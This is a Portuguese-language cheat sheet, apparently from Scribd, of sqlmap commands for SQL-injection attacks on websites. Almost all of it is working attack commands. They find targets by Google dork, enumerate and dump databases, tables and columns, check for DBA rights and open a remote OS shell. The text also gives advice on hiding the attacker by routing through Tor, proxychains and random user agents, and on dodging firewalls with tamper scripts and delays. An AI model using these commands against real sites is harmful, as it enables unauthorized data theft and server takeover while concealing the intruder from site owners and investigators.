0% acharam este documento útil (0 voto)
58 visualizações3 páginas

Comandos Básicos do SQLMap

O documento fornece instruções detalhadas sobre como usar a ferramenta sqlmap para realizar varreduras de vulnerabilidades em sites e bancos de dados, incluindo como utilizar o Tor e ProxyChains para anonimato.

Enviado por

Lucas Albani
Direitos autorais
© All Rights Reserved
Levamos muito a sério os direitos de conteúdo. Se você suspeita que este conteúdo é seu, reivindique-o aqui.
Formatos disponíveis
Baixe no formato TXT, PDF, TXT ou leia on-line no Scribd
0% acharam este documento útil (0 voto)
58 visualizações3 páginas

Comandos Básicos do SQLMap

O documento fornece instruções detalhadas sobre como usar a ferramenta sqlmap para realizar varreduras de vulnerabilidades em sites e bancos de dados, incluindo como utilizar o Tor e ProxyChains para anonimato.

Enviado por

Lucas Albani
Direitos autorais
© All Rights Reserved
Levamos muito a sério os direitos de conteúdo. Se você suspeita que este conteúdo é seu, reivindique-o aqui.
Formatos disponíveis
Baixe no formato TXT, PDF, TXT ou leia on-line no Scribd

➖➖➖➖➖ COMANDOS ➖➖➖➖➖

sqlmap -g e a dork q vc for usar


sqlmap -m (link do arquivo com os sites alvo)

sqlmap -u (sitealvo) --dbs


sqlmap -u (sitealvo) -D (bancodedadosdosite) --tables
sqlmap -u (sitealvo) -D (bancodedadosdosite) -T (tabelaavalida) --columns
sqlmap -u (sitealvo) -D (bancodedadosdosite) -T (tabelaavalida) -C (opcaodesejada)
--dump

sqlmap -u (sitealvo) -D (bancodedadosdosite) --columns # te lista todas as colunas


de todas as tabelas
sqlmap -u (sitealvo) -D (bancodedadosdosite) -T (tabelaavalida) --dump # baixa
todas as colunas da tabela

==============SQLMAP TRABALHANDO COM O TOR====================


É importante lembra que o uso do tor pode deixar todo p processo mais lento !
apt-get install tor #instalar tor

service tor status # pra conferir se o tor está ligado ou não

service tor start #liga o tor

sqlmap -u (sitealvo) --dbs --tor --check-tor --tor-type=SOCKS5 # dessa maneira voce


utiliza o tor junto com o sqlmap e evitar ter seu ip rastreado no logs do site
voce pode usar outro tipo de type de requisição do tor exemplo: --tor-type= (HTTP,
HTTPS, SOCKS4, SOCKS5)

sqlmap -u (sitealvo) --tor --check-tor --tor-type=SOCKS5 --dbs #voce pode usar


dessa forma tbm

sqlmap --tor --check-tor --tor-type=SOCKS5 -u (sitealvo) --dbs #ou dessa outra


forma

sqlmap -u (sitealvo) --tor --check-tor --tor-type=SOCKS5 -level 3 --risk 3 -v4 --


dbms "mysql" --dbs # essa maneira vc voce pode aumentar ou nivel de testes a serem
enviado no scam do site
voce pode usar do level 1-até 5 e o risk vc pode usar 1 até o 3
--level (1-5)
--risk(1-3)

ja o -v é o modo verbose do sqlmap , ele vai te dar mais detalhes do que a


ferramenta está fazendo! voce aumentar tbm os valores indo

-v(0-6) do 0 até o 6

sqlmap -u (sitealvo) --tor --check-tor --tor-type=SOCKS5 --level 3 --risk 3 -v4 --


dbs #voce tbm pode usar o camando dessa mandeira caso voce não saiba o tipo do sql
do back-end do site

sqlmap -u (sitealvo) -tor --check-tor --tor-type=SOCKS5 -v2 --level=3 --risk=3 --


tamper=space2comment,between --delay=1 --timeout=15 --retries=2 --time-sec=10 --
batch --random-agent --no-cast --dbs # analise profunda usando o tor

(obs: o comando --random-agent é muito importe pois ele usa um user-agente


diferente evitiando que os sites consiga identificar o sqlmap pelo user agente da
ferramenta! dessa forma o sqlmap se passa como se fosse um navagador normal de um
pc ou celular ! isso ira ajudar muito !
voce pode substituir o --random-agent pelo --user-agent=(COLOCAR O agent aqui)
porem dessa outra forma vc tem q colocar o user agente manualmente

sqlmap -u (sitealvo) -tor --check-tor --tor-type=SOCKS5 -v2 --level=3 --risk=3 --


tamper=space2comment,between --delay=1 --timeout=15 --retries=2 --time-sec=10 --
batch --random-agent --no-cast -D (bancodedadosdosite) --is-dba # maneira de ver
se tem uma bda na db do ste, normalmente se tiver vai retornar True, caso contratio
false

sqlmap -u (sitealvo) -tor --check-tor --tor-type=SOCKS5 -v2 --level=3 --risk=3 --


tamper=space2comment,between --delay=1 --timeout=15 --retries=2 --time-sec=10 --
batch --random-agent --no-cast -D (bancodedadosdoste) --os-shell #subindo shell
remota com o tor

===================================================================================
===================================================================================
===============================

================SEM USAR O
TOR================================================================================
========================================

SEM A UTILIZAÇÃO DO TOR O PRECESSO É MAIS RAPAIDO ! POREM SEU IP FICARA LA NOS LOG
DO SITE ! O IDEAL É UTILIZAR UMA VPN PELO MENOS

sqlmap -u (sitealvo) -v2 --level=3 --risk=3 --tamper=space2comment,between --


delay=1 --timeout=15 --retries=2 --time-sec=10 --batch --random-agent --ignore-
proxy --no-cast --dbs # comando anasile profunda

sqlmap -u (sitealvo) -v2 --level=3 --risk=3 --tamper=space2comment,between --


delay=1 --timeout=15 --retries=2 --time-sec=10 --batch --random-agent --ignore-
proxy --no-cast -D (bancodedadosdosite) --is-dba # maneira de ver se tem uma
bda na db do ste, normalmente se tiver vai retornar True, caso contratio false

sqlmap -u (sitealvo) -v2 --level=3 --risk=3 --tamper=space2comment,between --


delay=1 --timeout=15 --retries=2 --time-sec=10 --batch --random-agent --ignore-
proxy --no-cast -D (bancodedadosdosite) --os-shell #subindo shell remota sem o tor
===================================================================================
===================================================================================
==================================================================

================================SQLMAP UTILIZANDO O
PROXYCHAINS========================================================================
=============================================

(OBS: TODOS OS OUTROS COMANDOS CITADOS A CIMA PODEM SER UTILIZADOS NORMALMENTE COM
O PROXYCHAINS, POREM SE FOR USAR O PROXYCHAINS NÃO PODERA UTILZADA O COMANDO "--
ignore-proxy")

proxychains sqlmap -u (sitealvo) -v2 --level=3 --risk=3 --random-agent -D


(bancodedadosdosite) --os-shell --threads 10

proxychains sqlmap -u (sitealvo) -v2 ---level=3 --risk=3 --random-agent -D


(bancodedadosdoste) --os-shell --threads 10

================ALGUMAS INFORMAÇOES EXTRAS SQLMAP==================


--proxy-file=(coloca o arquivo com suas proxys) ele vai usar as proxy para fazer as
requisiçoes

--tor-port=(numero da porta) com esse comando vc configura o tor para poder


trabalhar com aquela porta especifica

--delay=(quantos 5 de delay) fazendo isso ele vai da um pausa nas requisiçoe no


site (isso fara q vc o scan demore mais ! pode ajudar a evitar bloqueio do
servidor)

--threads=(quantidade) aqui voce controla a quantidade de conexões q voce vai esta


fazendo na database do site

--time-sec=(quantidade)com isso ele vai atrasar as resposta do banco de dados do


site pra vc , isso ajuda a evitar bloquio de firewoll

Você também pode gostar